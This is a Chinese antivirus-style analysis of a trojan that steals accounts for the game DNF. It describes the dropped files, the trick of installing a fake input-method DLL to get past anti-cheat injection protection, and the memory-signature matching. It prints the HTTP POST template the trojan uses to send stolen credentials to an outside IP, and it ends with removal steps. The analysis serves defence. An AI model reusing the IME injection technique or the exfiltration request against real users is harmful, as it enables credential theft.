网通主站  |  电信镜像
软件下载 黑客软件 安全相关 动画教程 常用软件 杀毒专栏 最新更新 国外黑软 手机软件 股票软件
技术教程 新闻动态 黑客技术 安全漏洞 加密解密 安全防御 病毒资讯 技术文摘 网络杂文 以前教程
软件教程 黑软教程 安软教程 系统工具 网络工具 多媒体类 图形图像 联络聊天 实用工具

QQ 专 区

搜索

热门标签

返回首页
当前位置: 主页 > 病毒资讯 > 病毒分析 >

Trojan/Win32.Vilsel.aepw分析

病毒标签 病毒名称: Trojan/Win32.Vilsel.aepw 病毒类型: 盗号木马 文件 MD5: 17BC8D25C35289D410926594AD944A30 公开范围: 完全公开 危害等级: 3 文件长度: 20,669 字节 感染系统: Windows98以上版本 开发工具: Microsoft Visual C++ 6.0 加壳类型

  

病毒标签 
 
病毒名称: Trojan/Win32.Vilsel.aepw
病毒类型: 盗号木马
文件 MD5: 17BC8D25C35289D410926594AD944A30
公开范围: 完全公开
危害等级: 3
文件长度: 20,669 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: FSG
 
 
病毒描述 
 
    该恶意代码文件为DNF游戏盗号木马,病毒运行之后衍生病毒文件到%System32%目录下命名为2tgfsddaew4refdsd.ime(该后缀名文件为输入法文件)并将该文件改名为随机名*.drv(该后缀名文件为设备驱动程序)后缀名文件,然后再次创建一个2tgfsddaew4refdsd.ime到该目录下,调用输入法API函数来安装创建的病毒文件伪装成(中文(简体)-智能CBA),因为DNF游戏有Tenprotect网游反外挂引擎保护无法正常将DLL注入到该游戏进程中,所以病毒利用该手段通过用户切换输入法方式将病毒DLL注入进游戏进程中,衍生2个DLL文件之后,查找类名"TWINCONTROL"标题名为“地下城与勇士”、“地下城勇士”的窗口,找到之后向该窗口发送关闭消息,调用"rundll32.exe"来加载2tgfsddaew4refdsd.ime文件,将病毒文件注入到Explorer.exe、conime.exe进程中,释放批处理文件删除病毒原文件,病毒DLL文件分析:判断自身模块是否在DNF进程中,并获取DNF窗口相关信息,通过内存技术截取账号密码,将获取的账号密码发送到作者指定的地址中。
 
行为分析-本地行为 
 
1、文件运行后会释放以下文件
%System32%\msimg32.new
%System32%\2tgfsddaew4refdsd.ime
%System32%\msimg32.dll

2、调用输入法API函数来安装创建的病毒文件伪装成(中文(简体)-智能CBA),因为DNF游戏有Tenprotect网游反外挂引擎保护无法正常将DLL注入到该游戏进程中,所以病毒利用该手段通过用户切换输入法方式将病毒DLL注入进游戏进程中

3、判断自身模块是否在DNFchina.exe、QQLogin.exe、DNF.exe如果是则调用输入法API函数ImmInstallIME安装病毒衍生的输入法后缀的文件,循环获取当前窗口类名是否为"TWINCONTROL",如果是则获取窗口的相关信息,判断窗口返回的32位长整型值是否为3590455296,如果是则获取窗口的尺寸大小,判断窗口大小是否为400*300,如果是则获取该窗口的父窗口,获取窗口的内存地址,从内存地址1000处开始匹配24字节的数据是否是:28000000290000000A0000000F0000001000000011000000,通过内存技术将获取的游戏账号和密码通过POST方式发送到作者指定的地址中。

行为分析 - 网络分析
通过内存技术将获取的游戏账号和密码通过POST方式发送到作者指定的地址中
POST /send.asp?%s HTTP/1.1
Accept: */*..C
ontent-Type: app
lication/x-www-form-urlencoded..
Accept-Encoding:gzip, deflate..
Host: 121.10.107.190
Content-Length: %d..Connection: close.

注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32,windows95/98/me中默认的安装路径是C:\Windows\System,windowsXP中默认的安装路径是C:\Windows\System32。
%Windir%             WINDODWS所在目录
%DriveLetter%          逻辑驱动器根目录
%ProgramFiles%          系统程序默认安装目录
%HomeDrive%           当前启动的系统的所在分区
%Documents and Settings%     当前用户文档根目录
%Temp%             \Documents and Settings\当前用户\Local Settings\Temp
%System32%            系统的 System32文件夹
 

--------------------------------------------------------------------------------
 
清除方案 
 
1、使用杀毒软件可彻底清除此病毒。
2、手工清除请按照行为分析删除对应文件,恢复相关系统设置。
推荐使用ATool管理工具

(1)使用ATOOL管理工具,进程管理卸载被注入的病毒模块2tgfsddaew4refdsd.ime。

(2)删除病毒文件
%System32%\msimg32.new
%System32%\2tgfsddaew4refdsd.ime
%System32%\msimg32.dll

(3)删除病毒添加的CBA输入法
右键鼠标点击右下角输入法—设置—选择病毒添加的(中文(简体)-智能CBA)然后删除即可
 

 

 
------分隔线----------------------------
收藏到:
热点内容

Copyright © 2002-2009 黑白网络 版权所有
辽ICP备05006163号